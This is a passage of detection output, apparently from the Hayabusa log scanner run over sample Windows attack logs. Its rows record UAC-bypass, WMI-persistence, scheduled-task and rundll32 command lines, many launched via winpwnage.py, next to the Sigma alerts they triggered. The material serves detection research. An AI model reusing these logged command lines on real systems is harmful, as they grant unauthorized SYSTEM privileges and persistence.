: User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.340 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.418 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:39.746 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.903 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.981 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.090 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 